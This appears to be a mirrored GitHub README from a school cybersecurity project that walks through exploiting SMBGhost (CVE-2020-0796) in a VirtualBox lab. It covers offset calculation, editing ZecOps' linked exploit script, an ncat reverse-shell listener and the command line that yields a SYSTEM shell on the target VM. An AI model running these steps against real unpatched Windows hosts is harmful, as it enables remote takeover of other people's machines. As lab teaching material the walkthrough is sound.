来源

关联漏洞

介绍

# CVE-2020-0796 Exploit Demo (SMBGhost)

This project demonstrates a proof-of-concept (PoC) exploit of CVE-2020-0796, also known as SMBGhost - a critical pre-auth RCE vulnerability affecting Windows 10 and Windows Server systems using SMBv3. This was developed as part of a school cybersecurity project. All exploit code credit goes to ZecOps. I have only used and adapted it for educational purposes to demonstrate exploitation of CVE-2020-0796 within a controlled lab environment.

## Requirements for Demo

To replicate this demonstration, the following setup is required:

### Attacker Machine
- VirtualBox (using **NATNetwork** for VM networking)
- Windows 10 (any recent version)
- Python 3.x (added to system PATH)
- Netcat (included with Nmap or installed separately)
- Exploit script from GitHub PoC:  
  [`SMBleedingGhost.py` by ZecOps](https://github.com/ZecOps/CVE-2020-0796-RCE-POC)

### Target Machine
- VirtualBox (same **NATNetwork** configuration)
- **Windows 10 version 1903, release 19H1**  
  Build 18362.356 – 2019.09, Home or Pro Edition (x64)
- Windows Firewall disabled (to allow port 445 access)
- Offset calculation script from GitHub PoC:  
  [`calc_target_offsets.bat` by ZecOps](https://github.com/ZecOps/CVE-2020-0796-RCE-POC)
  

## Demonstration: Step-by-Step Exploit

### Step 1: Retrieve IP Addresses of Both VMs

1. Launch **Command Prompt** on both the **Attacker** and **Target** virtual machines.
2. Execute the following command in each machine:
   
   ```bash
   ipconfig
   
![Screenshot 2025-05-16 172329](https://github.com/user-attachments/assets/8a9a5880-e1d9-42c8-981a-aeaadfb7a022)

3. Take note of the IP addresses of the VMs — you’ll use them in the later steps.

---


### Step 2: Calculate Offsets on Target VM

1. On the **Target VM**, navigate to the `CVE-2020-0796-RCE-POC-master` folder.
2. Double-click to run the script: `calc_target_offsets.bat`

  
- This will generate memory offsets required for the exploit.
- Keep the window open and take note of the values shown — you’ll use them in the next step.

![Screenshot 2025-05-16 172350](https://github.com/user-attachments/assets/31b314b8-c563-400b-b041-57c74d5ba4bd)

---

### Step 3: Update Exploit Script on Attacker VM

1. On the **Attacker VM**, open the same `CVE-2020-0796-RCE-POC-master` folder.
2. Right-click `SMBleedingGhost.py` and open with Notepad.
3. In the `SMBleedingGhost.py` file, scroll down and locate the section that begins with `OFFSETS = {`.
4. Replace the existing offset values with the ones you obtained from the Target VM.
5. Save the file after editing.
6. You may now close the offset window on the Target VM.

![Screenshot 2025-05-16 172403](https://github.com/user-attachments/assets/01dcf451-5dcc-47c8-91bd-216393fe9609)

---

### Step 4: Start Netcat Listener on Attacker VM

Open a new Command Prompt and run:

```bash
ncat -lvp 4321
```

- This sets up a listener on port `4321` to receive a reverse shell from the Target VM upon successful exploitation.
- You can change the port number if needed.

![Screenshot 2025-05-16 172419](https://github.com/user-attachments/assets/e66991f1-6b6c-416c-b649-b8de12ee9da8)

---

### Step 5: Execute Exploit from Attacker VM

1. Open another Command Prompt and navigate to the PoC directory (I saved mine in Desktop):

```bash
cd Desktop
cd CVE-2020-0796-RCE-POC-master
dir
```

2. Run the exploit with the appropriate IPs and port:

```bash
python SMBleedingGhost.py <target_ip> <attacker_ip> <port>
```

![Screenshot 2025-05-16 172450](https://github.com/user-attachments/assets/d465e15a-8af1-4126-a280-254f971035df)

Example used in this demo:

```bash
python SMBleedingGhost.py 192.168.18.61 192.168.18.62 4321
```

- `192.168.18.61`: Target VM IP
- `192.168.18.62`: Attacker VM IP
- `4321`: Port used in the netcat listener

---

### Exploitation Outcome

If successful, the netcat window will show:

```
Microsoft Windows [Version 10.0.18362.356]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\Windows\system32>
```

This confirms that:
- The Target VM has been exploited
- The Attacker VM now has **system-level privileges**

You can validate access by executing:

```bash
whoami
```

This will give:
```
whoami
nt authority\system
```
This means that the Attacker VM now has **system-level privileges** on the Target VM.

![Screenshot 2025-05-16 172512](https://github.com/user-attachments/assets/958a569a-f6aa-41b7-8dda-d089b177ef30)

You can also run:
```bash
ipconfig
```
To verify you’re interacting with the Target VM’s network.

![Screenshot 2025-05-16 172550](https://github.com/user-attachments/assets/6b8de42f-1a80-4895-a038-fb652ec87a78)

**Note**: The Target VM may crash after exploitation. If it does, you may restart it. The attacker session will need to be re-established after reboot.

## Acknowledgements

This demonstration is based on the publicly available proof-of-concept developed by [ZecOps](https://github.com/ZecOps/CVE-2020-0796-RCE-POC).

All exploit code credit goes to ZecOps. I have only used and adapted it for educational purposes to demonstrate exploitation of CVE-2020-0796 within a controlled lab environment.

## References

- [CVE-2020-0796 Remote Code Execution POC](https://github.com/ZecOps/CVE-2020-0796-RCE-POC)

## Author
[@tdevworks](https://github.com/tdevworks)

## Disclaimer
This repository is created for educational purposes only.

All tools, scripts, and techniques demonstrated are intended to help understand cybersecurity vulnerabilities in a controlled lab environment. Do not attempt to use any of the provided materials on systems or networks that you do not own or have explicit permission to test.

Any misuse of the software will not be the responsibility of the author.

文件快照

 [4.0K]  /data/pocs/6e16ca5d90b82191f3f177753a788f42b7bcc145
└── [5.6K]  README.md

0 directories, 1 file

备注